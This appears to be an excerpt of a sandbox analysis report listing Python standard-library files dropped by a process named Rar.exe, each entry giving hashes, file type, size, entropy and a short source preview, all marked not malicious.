                                                                                                                                                                                                                                  SSDEEP:96:eE/i140+nvF19uaLUHzQRXwiX/H80Ni6BONKI1km8jKTlTZw+PTX+v5/fYvOn:eGV0+vZTLwQRXPPHriHhEu9Zw+PbM5/J
                                                                                                                                                                                                                                  MD5:76D45ABE784519B8C8552EF253C46F85
                                                                                                                                                                                                                                  SHA1:871A4ECAE472F27509ED8008F0438E942908C3DC
                                                                                                                                                                                                                                  SHA-256:32F429813D305FA49201E761F11AFAA9D9AED79016F4980C2F01CC90AB8BA48B
                                                                                                                                                                                                                                  SHA-512:DC594987EB61BFA87564637C661B361679A84B8042C6B54F2BFE04D9EDFF5F138E509D93D4C517FAD2192D154BFEB9210B1B61704F4F2B582CEA35FC279C4A35
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Pseudo terminal utilities."""....# Bugs: No signal handling. Doesn't set slave termios and window size...# Only tested on Linux, FreeBSD, and macOS...# See: W. Richard Stevens. 1992. Advanced Programming in the..# UNIX Environment. Chapter 19...# Author: Steen Lumholt -- with additions by Guido.....from select import select..import os..import sys..import tty....# names imported directly for test mocking purposes..from os import close, waitpid..from tty import setraw, tcgetattr, tcsetattr....__all__ = ["openpty", "fork", "spawn"]....STDIN_FILENO = 0..STDOUT_FILENO = 1..STDERR_FILENO = 2....CHILD = 0....def openpty():.. """openpty() -> (master_fd, slave_fd).. Open a pty master/slave pair, using os.openpty() if possible.""".... try:.. return os.openpty().. except (AttributeError, OSError):.. pass.. master_fd, slave_name = _open_terminal().. slave_fd = slave_open(slave_name).. return master_fd, slave_fd....def master_open():.. """mas
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8049
                                                                                                                                                                                                                                  Entropy (8bit):4.51326914454816
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:mhnIB1tuDZ6ryJ0Dl8kr+5MboQE/Hcw1Zatu4dkKk6Dg7D3USWJ3DirI2dVDHsky:mnI5uB580/Z8UIg8Sm+rI2PDHsky
                                                                                                                                                                                                                                  MD5:686E650CC5186DF740BB778A11376241
                                                                                                                                                                                                                                  SHA1:32D7D66CAFDE71C7F16A33E52AB7CE093912B04F
                                                                                                                                                                                                                                  SHA-256:BA4E5D1AC94FEC03BB7EDE8E1B7E4D56C8F165D9B3CDD130E16902D13489FCC4
                                                                                                                                                                                                                                  SHA-512:F8E444ADB2359CFD7BA3B14B9388AF4023FB71AEF211FAB82373C0FDD24E9F2ABB065489A7F2AE693852AC189F3B3163620200FC968F071092596900ABB901F4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Routine to "compile" a .py file to a .pyc file.....This module has intimate knowledge of the format of .pyc files..."""....import enum..import importlib._bootstrap_external..import importlib.machinery..import importlib.util..import os..import os.path..import sys..import traceback....__all__ = ["compile", "main", "PyCompileError", "PycInvalidationMode"]......class PyCompileError(Exception):.. """Exception raised when an error occurs while attempting to.. compile the file..... To raise this exception, use.... raise PyCompileError(exc_type,exc_value,file[,msg]).... where.... exc_type: exception type to be used in error message.. type name can be accesses as class variable.. 'exc_type_name'.... exc_value: exception value to be used in error message.. can be accesses as class variable 'exc_value'.... file: name of file being compiled to be used in error message.. c
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11710
                                                                                                                                                                                                                                  Entropy (8bit):4.504337884600187
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:BzHcJfRYL1hkj7CXEpriGyN1R73rM9R5BWq/3wSg9bberhTtsahL:Bz8JRYLXE3ab77MD5wq/34buhxsaR
                                                                                                                                                                                                                                  MD5:67EDE4D94842456FA89ABA6B55AA448C
                                                                                                                                                                                                                                  SHA1:ED3E010535D4418EE95C61F65674F5B3FEBDDFE1
                                                                                                                                                                                                                                  SHA-256:E87683A58D47E7E7C49BD1BB83BEC01BC8EDF803DEFF289AC30C2C5FCC8DA979
                                                                                                                                                                                                                                  SHA-512:7D500CC706E1D2936B22894979881AE3A7BC40949A085780F684C64441227ECCFBC6DB5B6711CF82E169169761B291AB0458E46E7835C8D41947B2CA002853B4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Parse a Python module and describe its classes and functions.....Parse enough of a Python file to recognize imports and class and..function definitions, and to find out the superclasses of a class.....The interface consists of a single function:.. readmodule_ex(module, path=None)..where module is the name of a Python module, and path is an optional..list of directories where the module is to be searched. If present,..path is prepended to the system search path sys.path. The return value..is a dictionary. The keys of the dictionary are the names of the..classes and functions defined in the module (including classes that are..defined via the from XXX import YYY construct). The values are..instances of classes Class and Function. One special key/value pair is..present for packages: the key '__path__' has a list as its value which..contains the package search path.....Classes and Functions have a common superclass: _Object. Every instance..has the following attributes:.. mod
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):112431
                                                                                                                                                                                                                                  Entropy (8bit):4.588435548990698
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:dsw0YAnUM+dsvmxD3bDhaC7p09Nsrnz0loD/im9OTB3P:ds8AcdsGDP8jvAzRD/nON3P
                                                                                                                                                                                                                                  MD5:66C9AF70881505FD7E9B83465C102F03
                                                                                                                                                                                                                                  SHA1:B5F055339170C7755BE08763AD9E5D5A543DDF29
                                                                                                                                                                                                                                  SHA-256:F4D1143A78C6B993BE749C773D0E83313A2F6E118E1CC676C1CA4EFA15CFD7B9
                                                                                                                                                                                                                                  SHA-512:3581CD47E0E9AA713A2F151EFBDFC2CCFA7F80609A5E25A42CD6D01A641CA1AC4666F548F2197E827FA46983D1FEFDE87E55126690BAA04296991A64EB64930F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#!/usr/bin/env python3.."""Generate Python documentation in HTML or text for interactive use.....At the Python interactive prompt, calling help(thing) on a Python object..documents the object, and calling help() starts up an interactive..help session.....Or, at the shell command line outside of Python:....Run "pydoc <name>" to show documentation on something. <name> may be..the name of a function, module, package, or a dotted reference to a..class or function within a module or module in a package. If the..argument contains a path segment delimiter (e.g. slash on Unix,..backslash on Windows) it is treated as the path to a Python source file.....Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines..of all available modules.....Run "pydoc -n <hostname>" to start an HTTP server with the given..hostname (default: localhost) on the local machine.....Run "pydoc -p <port>" to start an HTTP server on the given port on the..local machine. Port number 0 can be used to get an
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11822
                                                                                                                                                                                                                                  Entropy (8bit):4.376403701654197
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:8yWZYD0IZsvHoH13DwaZbr1r+OO4HHHhBxwrA17IVhHohkwoa0vui8uftYi6zRSh:8ffIZTlZfphhVaazoBVYJeDQazkRQ
                                                                                                                                                                                                                                  MD5:F777EB2684C7FFA466D1546E1972F8F1
                                                                                                                                                                                                                                  SHA1:A2E1B0ADBE02008139E1DAFABFD14E3D33E5539A
                                                                                                                                                                                                                                  SHA-256:3160B770DC5CBDF0A5F9297DD8EA7FB77ACD99B36AF8088C8015B119D2E5069F
                                                                                                                                                                                                                                  SHA-512:7BDEC8B19CDA7A6682A93719AB551A3EA7DB157685EFD208F56B51049A177E7A0D69235AA954F755D881DC4BD8670D4CB120949EFEEE86148CFB5544A4D487EE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:'''A multi-producer, multi-consumer queue.'''....import threading..import types..from collections import deque..from heapq import heappush, heappop..from time import monotonic as time..try:.. from _queue import SimpleQueue..except ImportError:.. SimpleQueue = None....__all__ = ['Empty', 'Full', 'Queue', 'PriorityQueue', 'LifoQueue', 'SimpleQueue']......try:.. from _queue import Empty..except ImportError:.. class Empty(Exception):.. 'Exception raised by Queue.get(block=0)/get_nowait().'.. pass....class Full(Exception):.. 'Exception raised by Queue.put(block=0)/put_nowait().'.. pass......class Queue:.. '''Create a queue object with a given maximum size..... If maxsize is <= 0, the queue size is infinite... '''.... def __init__(self, maxsize=0):.. self.maxsize = maxsize.. self._init(maxsize).... # mutex must be held whenever the queue is mutating. All methods.. # that acquire mutex must release it before returning.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7510
                                                                                                                                                                                                                                  Entropy (8bit):4.528644805401654
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:nP6LcGY5uUuWgCSqkc97dlDsYJuLz9/x/1d0:CjUuokcddl5oM
                                                                                                                                                                                                                                  MD5:3B06A77D6A302CB952C0A488387F1624
                                                                                                                                                                                                                                  SHA1:2C60F0345E160E7A793091EE6021E5A5760A3523
                                                                                                                                                                                                                                  SHA-256:72312E4C1815E29A236D62871D313A9A2393A424A3E04AC3A1393A09C032D22D
                                                                                                                                                                                                                                  SHA-512:4891E6FC7C6C29DFFDC632835B4272012B61A0A703852C64A80AACA35FB083747C650CA0D24C70283AE53DB975A7F58D0132D3869827C4EAC79F51653E8BACF1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#! /usr/bin/env python3...."""Conversions to/from quoted-printable transport encoding as per RFC 1521."""....# (Dec 1991 version).....__all__ = ["encode", "decode", "encodestring", "decodestring"]....ESCAPE = b'='..MAXLINESIZE = 76..HEX = b'0123456789ABCDEF'..EMPTYSTRING = b''....try:.. from binascii import a2b_qp, b2a_qp..except ImportError:.. a2b_qp = None.. b2a_qp = None......def needsquoting(c, quotetabs, header):.. """Decide whether a particular byte ordinal needs to be quoted..... The 'quotetabs' flag indicates whether embedded tabs and spaces should be.. quoted. Note that line-ending tabs and spaces are always encoded, as per.. RFC 1521... """.. assert isinstance(c, bytes).. if c in b' \t':.. return quotetabs.. # if header, we have to escape _ because _ is used to escape space.. if c == b'_':.. return header.. return c == ESCAPE or not (b' ' <= c <= b'~')....def quote(c):.. """Quote a single character.""".. assert isins
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):34151
                                                                                                                                                                                                                                  Entropy (8bit):4.491133205294742
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:C3reJ1jUijTWhhG3AF+ziPmfHbWW+DN5ayEW:ViG3y+zSmz8x
                                                                                                                                                                                                                                  MD5:D9F1783FF1C70E418F49EB5862894B8C
                                                                                                                                                                                                                                  SHA1:0F5A7AA6B90253596839C64E504A8C445F3265A0
                                                                                                                                                                                                                                  SHA-256:E2F9C9E08EE7A922D6AE50FED25CB4EFCF833B86D857D846A2BB6C55600D3C25
                                                                                                                                                                                                                                  SHA-512:CABCE9F6CE02F7CD1AE63840E208C16AFAEF9BB66261F8D8F1533F116F029247199BF4F5FF80545681A2DA8182C7AB3AD8CA98CD03416622962EB59726B8B6BE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Random variable generators..... bytes.. -----.. uniform bytes (values between 0 and 255).... integers.. --------.. uniform within range.... sequences.. ---------.. pick random element.. pick random sample.. pick weighted random sample.. generate random permutation.... distributions on the real line:.. ------------------------------.. uniform.. triangular.. normal (Gaussian).. lognormal.. negative exponential.. gamma.. beta.. pareto.. Weibull.... distributions on the circle (angles 0 to 2pi).. ---------------------------------------------.. circular uniform.. von Mises....General notes on the underlying Mersenne Twister core generator:....* The period is 2**19937-1...* It is one of the most extensively tested generators in existence...* The random() method is implemented in C, executes i
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):16243
                                                                                                                                                                                                                                  Entropy (8bit):4.697959708532748
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:6bda8nr7PRL1AoscB8kRD/y/0cy/9O1+1Q0:6pa8nrrRpAoscBBRD6/y/9O1+1X
                                                                                                                                                                                                                                  MD5:F04D4A880157A5A39BBAFC0073B8B222
                                                                                                                                                                                                                                  SHA1:92515B53EE029B88B517C1F2F26F6D022561F9B4
                                                                                                                                                                                                                                  SHA-256:5AE8929F8C0FB9A0F31520D0A909E5637D86C6DEBB7C0B8CBACC710C721F9F7D
                                                                                                                                                                                                                                  SHA-512:556AAACFC4237B8AB611922E2052407A6BE98A7FB6E36E8D3ED14412B22E50ABAC617477F53ACFA99DBA1824B379C86376991739D68749EB5F162E020E7999CB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# Secret Labs' Regular Expression Engine..#..# re-compatible interface for the sre matching engine..#..# Copyright (c) 1998-2001 by Secret Labs AB. All rights reserved...#..# This version of the SRE library can be redistributed under CNRI's..# Python 1.6 license. For any other use, please contact Secret Labs..# AB (info@pythonware.com)...#..# Portions of this engine have been developed in cooperation with..# CNRI. Hewlett-Packard provided funding for 1.6 integration and..# other compatibility work...#....r"""Support for regular expressions (RE).....This module provides regular expression matching operations similar to..those found in Perl. It supports both 8-bit and Unicode strings; both..the pattern and the strings being processed can contain null bytes and..characters outside the US ASCII range.....Regular expressions can contain both special and ordinary characters...Most ordinary characters, like "A", "a", or "0", are the simplest..regular expressions; they simply match them
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5428
                                                                                                                                                                                                                                  Entropy (8bit):4.417412104082839
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:Sr5xgG+4UXDromvJYKvi8hkEfoerKBLi22z80OsgmtoJLe4N90Mvs7hui:I+BromPUjyJ+LeQ2Yri
                                                                                                                                                                                                                                  MD5:E7C51384148475BFFEB9729DF4B33B69
                                                                                                                                                                                                                                  SHA1:58109E3AE253B6F9BF94BD8A2C880BEAE0EDDF94
                                                                                                                                                                                                                                  SHA-256:3BE6CDE6103319B3CA44BBC4D40C60E0BCB14A53E93E2578E8E4E850F4A8C66B
                                                                                                                                                                                                                                  SHA-512:A7C81FD784E537DA08A8EAD5A6C635B66123DE815B73FAE2B9F1662CF49AF4C9E41E648075CC0EE2A64C034FA38DA4A4E90163E9B955B17D20490EEB86004341
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Redo the builtin repr() (representation) but with limits on most sizes."""....__all__ = ["Repr", "repr", "recursive_repr"]....import builtins..from itertools import islice..from _thread import get_ident....def recursive_repr(fillvalue='...'):.. 'Decorator to make a repr function return fillvalue for a recursive call'.... def decorating_function(user_function):.. repr_running = set().... def wrapper(self):.. key = id(self), get_ident().. if key in repr_running:.. return fillvalue.. repr_running.add(key).. try:.. result = user_function(self).. finally:.. repr_running.discard(key).. return result.... # Can't use functools.wraps() here because of bootstrap issues.. wrapper.__module__ = getattr(user_function, '__module__').. wrapper.__doc__ = getattr(user_function, '__doc__').. wrapper.__name__ = getattr(user_function, '__name__').
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8036
                                                                                                                                                                                                                                  Entropy (8bit):4.287904072572339
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:2rW3kbV7us2JNNHU9lfnhRU4Fnv4blKREfGCcshW5YvNEEv+B:KGk1uHU9xhR5nvxCED1EWB
                                                                                                                                                                                                                                  MD5:FE0FF94FFFE2562374E8A375642273DF
                                                                                                                                                                                                                                  SHA1:21A40B86C9C389A3A8CF23CCC9CEB34E31DF5365
                                                                                                                                                                                                                                  SHA-256:F06D3AFBA28DE908AC91EA1361C66D5F567D4755EEECAF91740019B7E64B25DC
                                                                                                                                                                                                                                  SHA-512:98070C06DC839CC169F9E5CE4850C9B001F52645531BDC309C411D9B98BE200003FE3E6D99872F782A92DCF97C21A7AFD7CCC351F329D24C9FF1739856755CB8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Word completion for GNU readline.....The completer completes keywords, built-ins and globals in a selectable..namespace (which defaults to __main__); when completing NAME.NAME..., it..evaluates (!) the expression up to the last dot and completes its attributes.....It's very cool to do "import sys" type "sys.", hit the completion key (twice),..and see the list of names defined by the sys module!....Tip: to use the tab key as the completion key, call.... readline.parse_and_bind("tab: complete")....Notes:....- Exceptions raised by the completer function are *ignored* (and generally cause.. the completion to fail). This is a feature -- since readline sets the tty.. device in raw (or cbreak) mode, printing a traceback wouldn't work well.. without some complicated hoopla to save, reset and restore the tty state.....- The evaluation of the NAME.NAME... form may cause arbitrary application.. defined code to be executed if an object with a __getattr__ hook is found... Since it is th
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13432
                                                                                                                                                                                                                                  Entropy (8bit):4.4682911817309865
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:E5HgdO+nKGY9d9GxlJ4fr+2O4lAfhdgkdn+eO9:E5p5z3r+FRhdJO9
                                                                                                                                                                                                                                  MD5:EAD7DE516F81BDF655C6E96A2BC0D3C9
                                                                                                                                                                                                                                  SHA1:FE69379AC14C0F742E02482839B20FDA1BFE4325
                                                                                                                                                                                                                                  SHA-256:001DEC8ADF8925F2C61C25F4F4D49CDAD60E2AF45D1B34692C60AB022889120B
                                                                                                                                                                                                                                  SHA-512:3A47A82096E5849EEEF06B5B79EFC687DB6D0E93716E3C3B0C13135BD70464943213475E353C3C3F1A89EFB068EC4EF1C394A4EB4D550425FD5146ED49CD6BD9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""runpy.py - locating and running Python code using the module namespace....Provides support for locating and running Python scripts using the Python..module namespace instead of the native filesystem.....This allows Python code to play nicely with non-filesystem based PEP 302..importers when locating support scripts as well as when importing modules..."""..# Written by Nick Coghlan <ncoghlan at gmail.com>..# to implement PEP 338 (Executing Modules as Scripts)......import sys..import importlib.machinery # importlib first so we can test #15386 via -m..import importlib.util..import io..import types..import os....__all__ = [.. "run_module", "run_path",..]....class _TempModule(object):.. """Temporarily replace a module in sys.modules with an empty namespace""".. def __init__(self, mod_name):.. self.mod_name = mod_name.. self.module = types.ModuleType(mod_name).. self._saved_module = [].... def __enter__(self):.. mod_name = self.mod_name..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6518
                                                                                                                                                                                                                                  Entropy (8bit):4.428021460534201
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:7q7NKEDtr4SBrumjWpdBpBO6tibxmPKq5d6JIad/vkk:7q7N7jU26ut2Q/vkk
                                                                                                                                                                                                                                  MD5:BBC46866A07502770BEC1716C4F1CEF0
                                                                                                                                                                                                                                  SHA1:6E1FD86C4786295109C5F67194C980238A780C56
                                                                                                                                                                                                                                  SHA-256:D337D7DDBEB4852D806AE3D29DD73C0F2E0A332C8CE4BEADDF7173C34D6849D8
                                                                                                                                                                                                                                  SHA-512:FF21A29BDB6E29D0A2FEB1FC711B33055001D529F28034C2F37D5159BB709D93FE51305F43D60B36CDE7D181C8876EB7FD2BBC1D43E49F2FE3CD27BD9DB832F4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""A generally useful event scheduler class.....Each instance of this class manages its own queue...No multi-threading is implied; you are supposed to hack that..yourself, or use a single instance per application.....Each instance is parametrized with two functions, one that is..supposed to return the current time, one that is supposed to..implement a delay. You can implement real-time scheduling by..substituting time and sleep from built-in module time, or you can..implement simulated time by writing your own functions. This can..also be used to integrate scheduling with STDWIN events; the delay..function is allowed to modify the queue. Time can be expressed as..integers or floating point numbers, as long as it is consistent.....Events are specified by tuples (time, priority, action, argument, kwargs)...As in UNIX, lower priority numbers mean higher priority; in this..way the queue can be maintained as a priority queue. Execution of the..event means calling the action function, pa
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2108
                                                                                                                                                                                                                                  Entropy (8bit):5.0681098576980395
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:OHe6kvHbJSNg/Yya6+N+Rv+f3xg8boRkGm26/UZ68fpqstap:mJk1Sq/YN6pRvGxgnRkGm26/UZ6+qAK
                                                                                                                                                                                                                                  MD5:C603DB6D1DC7CA53EF4EDF99ADE55CD6
                                                                                                                                                                                                                                  SHA1:36FD0055E017C494EB0E37FD15BA520896C3E4CA
                                                                                                                                                                                                                                  SHA-256:8B91B370319945770CCC838EBDF438313212129EB1F7E1938DD0882688EC7A18
                                                                                                                                                                                                                                  SHA-512:99F3C414DC3C997D5E246F427628419538115DF21EB7F48A690895AEA179C6F4596BDA0BB75FC9756281EEFE6C926393C6745C65EC6F916FA554B37FAC3804C3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Generate cryptographically strong pseudo-random numbers suitable for..managing secrets such as account authentication, tokens, and similar.....See PEP 506 for more information...https://www.python.org/dev/peps/pep-0506/...."""....__all__ = ['choice', 'randbelow', 'randbits', 'SystemRandom',.. 'token_bytes', 'token_hex', 'token_urlsafe',.. 'compare_digest',.. ]......import base64..import binascii....from hmac import compare_digest..from random import SystemRandom...._sysrand = SystemRandom()....randbits = _sysrand.getrandbits..choice = _sysrand.choice....def randbelow(exclusive_upper_bound):.. """Return a random int in the range [0, n).""".. if exclusive_upper_bound <= 0:.. raise ValueError("Upper bound must be positive.").. return _sysrand._randbelow(exclusive_upper_bound)....DEFAULT_ENTROPY = 32 # number of bytes to return by default....def token_bytes(nbytes=None):.. """Return a random byte string containing *nbytes* bytes.....
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20155
                                                                                                                                                                                                                                  Entropy (8bit):4.441366171897365
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:dTlKqIJUzY8EJm8QQo7YA3bVMR0Qid+dWMcK3CM1pBY45wBrhc6YN4o4F1Yzp8cW:dxK8DEDEBBhQErzhF8eTpJ
                                                                                                                                                                                                                                  MD5:01BBBA21BD0235FB164A2ED722AD6D04
                                                                                                                                                                                                                                  SHA1:CBCF9E771D22817D8AED482166D70D16E8711D36
                                                                                                                                                                                                                                  SHA-256:28DA125E058CD0E535467B214B510EE4B1E666BE57EDB183404C09EDF935EBBC
                                                                                                                                                                                                                                  SHA-512:1626C618D742458D1C66626758A0BC28F1C829C60EC8F14B02BFD7E82803FF771103C0D5C22C063229920478F5BAAF694B8DBA32115DD5C41AF290153F634F2D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Selectors module.....This module allows high-level and efficient I/O multiplexing, built upon the..`select` module primitives..."""......from abc import ABCMeta, abstractmethod..from collections import namedtuple..from collections.abc import Mapping..import math..import select..import sys......# generic events, that must be mapped to implementation-specific ones..EVENT_READ = (1 << 0)..EVENT_WRITE = (1 << 1)......def _fileobj_to_fd(fileobj):.. """Return a file descriptor from a file object..... Parameters:.. fileobj -- file object or file descriptor.... Returns:.. corresponding file descriptor.... Raises:.. ValueError if the object is invalid.. """.. if isinstance(fileobj, int):.. fd = fileobj.. else:.. try:.. fd = int(fileobj.fileno()).. except (AttributeError, TypeError, ValueError):.. raise ValueError("Invalid file object: ".. "{!r}".format(fileobj)) from None.. if fd < 0:..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8803
                                                                                                                                                                                                                                  Entropy (8bit):4.563820102763972
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:0x+ykEgEzeDlpO/ki7QqpiG9GikHQ/aBKC8rFo:07kEgEzeDlpO/kiJpa9BYO
                                                                                                                                                                                                                                  MD5:D72FAB00C3F5E7AED0B707D03A30CB02
                                                                                                                                                                                                                                  SHA1:54751E0C54FB64364A9989D9D7B519C3D1E293EF
                                                                                                                                                                                                                                  SHA-256:0C8AC8DCB31AB0E9B5EBFD1CC99A827BC78DEFF9966BCC7F7B6A3AB08388A9AE
                                                                                                                                                                                                                                  SHA-512:D127A2E2F6740A2845EBF455D3501B85D60F4E452D2D48029D47584149646C2A2ED189D6B9A4D6AD544EE9102ED9D3FF2579DFE348FFC641CA7CE2D292A381C2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Manage shelves of pickled objects.....A "shelf" is a persistent, dictionary-like object. The difference..with dbm databases is that the values (not the keys!) in a shelf can..be essentially arbitrary Python objects -- anything that the "pickle"..module can handle. This includes most class instances, recursive data..types, and objects containing lots of shared sub-objects. The keys..are ordinary strings.....To summarize the interface (key is a string, data is an arbitrary..object):.... import shelve.. d = shelve.open(filename) # open, with (g)dbm filename -- no suffix.... d[key] = data # store data at key (overwrites old data if.. # using an existing key).. data = d[key] # retrieve a COPY of the data at key (raise.. # KeyError if no such key) -- NOTE that this.. # access returns a *copy* of the entry!.. del d[key] # delete data stored at key (raises KeyError..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13851
                                                                                                                                                                                                                                  Entropy (8bit):4.098342133535539
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:TiBJXH8qfr4rCOaCDCCaZUCELCrC46CBJ/WKCvCCxrJMBCSYCieC1eCEyCS412/u:TiBJXH8qf/qd67WaaZaUT66T6T1gzji
                                                                                                                                                                                                                                  MD5:618BD4282F39939BF6F935F67D4107C7
                                                                                                                                                                                                                                  SHA1:42E6CD923D7EE305A0D70F6BA861DE587EC2F444
                                                                                                                                                                                                                                  SHA-256:731C1374ED3D47C53C0C38E4898F2A21DF0B7984E730C7FF3F3B26B96B25FAC6
                                                                                                                                                                                                                                  SHA-512:7710378DA30D5CEE798FE09FA60B2B8A7C1F4E0B288E0F37319C7AC574451CBE6B983E82A2A813CD64BBD8C04807686080AC8C7FD105E584E35AF51FFED1B5B1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""A lexical analyzer class for simple shell-like syntaxes."""....# Module and documentation by Eric S. Raymond, 21 Dec 1998..# Input stacking and error message cleanup added by ESR, March 2000..# push_source() and pop_source() made explicit by ESR, January 2001...# Posix compliance, split(), string arguments, and..# iterator interface by Gustavo Niemeyer, April 2003...# changes to tokenize more like Posix shells by Vinay Sajip, July 2016.....import os..import re..import sys..from collections import deque....from io import StringIO....__all__ = ["shlex", "split", "quote", "join"]....class shlex:.. "A lexical analyzer class for simple shell-like syntaxes.".. def __init__(self, instream=None, infile=None, posix=False,.. punctuation_chars=False):.. if isinstance(instream, str):.. instream = StringIO(instream).. if instream is not None:.. self.instream = instream.. self.infile = infile.. else:.. self.ins
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):55816
                                                                                                                                                                                                                                  Entropy (8bit):4.55270615672447
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:pQmQwxUSSvo4zYHze7D2tYy0QZGqr8TyvBZ9hmmDcrEi:pQmpnSvo4ETe7YuuDcrEi
                                                                                                                                                                                                                                  MD5:964EE17F609BDE1FDDC4EBE87DB9DC63
                                                                                                                                                                                                                                  SHA1:7073C339362B7DD618C02A6DBAD5B465A5CF3DC1
